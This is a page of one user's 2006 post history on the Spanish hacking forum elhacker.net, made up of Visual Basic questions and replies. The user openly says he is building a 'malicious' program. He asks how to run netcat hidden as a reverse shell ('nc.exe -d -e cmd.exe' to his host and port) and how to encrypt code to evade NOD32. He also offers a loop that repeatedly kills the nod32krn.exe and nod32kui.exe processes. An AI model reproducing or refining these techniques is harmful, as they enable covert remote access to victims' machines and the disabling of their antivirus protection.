elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12
81  Programación / Programación Visual Basic / Re: Porblema con Shell en: 6 Junio 2006, 17:28 pm
_Sergi_:

okis perfecto, no pasa na man ;), a lo de usar ShellExecute bien, pero podria tú cres ejecutar esto: (con esa api) nc.exe -d -e cmd.exe mi host miport ??? podria..se que tb se puede ocultar con SW_HIDE o con 0 pero eso...puedo? es que no me hago la idea de como seria...como yo lo intente no anda, quiero decir que no ejecuta netcat + parametros + cmd...no me lo deja preparado :P , pero si ejecuto cmd....lo corre en modo oculto , lo mismo para el netcta pero como te dije lo que yo quiero no, o alomejor lo hago mal la sintasis ;) bueno .salu2. Muchas gracias man.
82  Foros Generales / Sugerencias y dudas sobre el Foro / Para el Señor el brujo!. en: 6 Junio 2006, 17:15 pm
 :huh: podria decirle a los moderadores del foro y demas personal que cuando muevan un post mio o lo borren se me notifique de porque  :huh: es que se me desaparecio uno aller mismo...que no tenia ningun contenido, ofensivo..y es más es una duda que servia para si a otro le pasaba lo mismo, lo que alguien penso que no tenia ninguna utilidad pues el si conocia lo que comento en el post, entonces pediria más que sea que se notifique y un porque, creo que es lo minimo, todo bien sin porblemas, pero hombre :) no hagan esas cosas asi como asi, que de verdad que queria enterarme de la ? de mi post y ....me lo han desaparecio : \

salu2
83  Programación / Programación Visual Basic / Re: Porblema con Shell en: 6 Junio 2006, 02:36 am
_Sergi_...si gracias man no tomes a mal lo que te voy a decir..mi ortografia no sera buena pero mas que sea es legible ;) esa es una, la 2ª es que ya se que shell no es una instruccion como tú dices maligna , la he usado muchas veces...amigo..simplemente dije que si pongo en cualquier parte del codigo shell...me lo detecta como virus..sino lo pongo no la detecta..dije,...no se que podra ser..por eso mismo..no se con que parte del codigo puede estar relacionando nod32 esa isntrcuion ( shell ) como brusca, peligrosa como quieras decirlo, pero muchas garcias man, no más si me molesto lo de la ortagrafia...man te aseguro que en este foro cuando me registre por primera vez habia que descifrar mis post ;) y creo que he dado un cambio, no seas " tan duro", más fácil, si me quieres ayudar :) perfecto pero no..me intentes..como castigar..buscandome el fallo :) nunca yo te he echo ni a nadie, no mas diciendote lo que pienso aparte del tema de lo que va el post, te lo digo pa que lo sepas porque no soy de esas señoritas que van diciendo por detras yo te lo digo ati para que tú lo leas y ya te dije de buen royo todo esto..pero no me trates como bobo men :), thanks por los consejos y salu2.
84  Programación / Programación Visual Basic / Re: Porblema con Shell en: 5 Junio 2006, 20:24 pm
 :huh: Nadie me puede ayudar con eso ?
85  Programación / Programación Visual Basic / Re: Porblema con Shell en: 5 Junio 2006, 19:03 pm
 :huh: LuckyFox: no entendiste esto: y una mala createprocess  :huh: disuclpame pero no entiendo que quieres decir...y una duda..lo que quiero ejecutar con shell es netcat + cmd seria una sintasis haci con shell ("cmd.exe /c winnc -d -e cmd.exe mihost miport"), vbHide ....podria hacer eso.....pero..como tú dices, con shellexecute ? ( tb oculto..como el vbhide de shell )..si es asi dimelo...porque me hibas ha ayudar un huevo, thanks man. espero respuesta, salu2.
86  Programación / Programación Visual Basic / Porblema con Shell en: 5 Junio 2006, 18:35 pm
Buenas pues stoy escribiendo una app ..en vb..jeje, no es un trojan, pero si maliciosa XDDD  decir que es indetectable...hasta el momento en que ponga en el codigo ( en cualkier parte , x lo menos de las que lo he puesto) Shell, como ponga shell en cualquier parte del codec...inluc esto señores... Shell ("calc").....ya salta el nod32 cuando voy a compilar y lo detecta como nuevo virus por heruistica....ya digo...hasta si pongo que ejeucte la calculadora como ejemplo lo detcta...( lo puse para probar y canta nod32 )..no se porque si pongo simplmente Shell n la parte que sea del codec me lo detecta nod32...mientras no ponga shell sigue siendo indetectable...alguien tiene una idea de que pueda ser.............yo...estoy trabao. salu2.
87  Programación / Programación Visual Basic / Algun metodo seguro!! en: 3 Junio 2006, 14:22 pm
Hola alguien tiene un algoritmo de encriptacion para vb capaz de evadir al nod32?? algun modulo...alguna función..pero vamos que este comprobado por usted que funciona, es que el jodio nod32 es el único que me detecta mi aplicacción, Jodio Nod32 XD

.salu2.
88  Programación / Programación Visual Basic / Re: Killer en: 27 Mayo 2006, 22:37 pm
en mi pc...no vulve a iniciar nod32...sera que la manera que estas usando para matar los procesos no es la adecuada ;)
89  Programación / Programación Visual Basic / Re: Killer en: 27 Mayo 2006, 21:15 pm
Citar
otra cosa me fije en el administrador de tareas de windows y el nod32krn sigue durante la ejecucion del programa. undecided maldito nod Angry no hay una forma de que no deje ejecutar el proceso nod32krn.exe?

Respuesta:

Claro matando el nod32kui.exe y el nod32krn.exe....no ves el icono..., desaparece el icono porque esta cerrada completamente la aplicación y que porque se te inicio solo? ( ni idea ) SaluDOS.
90  Programación / Programación Visual Basic / Re: Killer en: 27 Mayo 2006, 17:13 pm
rubeng

Código:
Do While lol < 3
lol = lol + 1
If lol = 2 Then lol = 1
DoEvents
"aqui el codigo con el que matas al antivirus o la función que ayas creado"
Loop

eso es un bucle infinito cuando mate al nod32 y vuleva a intentar iniciarse vuleve a realizar el mismo proceso una y otra vez, x ejemplo una app que se inicie con windows prueba hacerlo y con el bucle ese y creo que no iniciaria nod32.

SaluDOS.
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines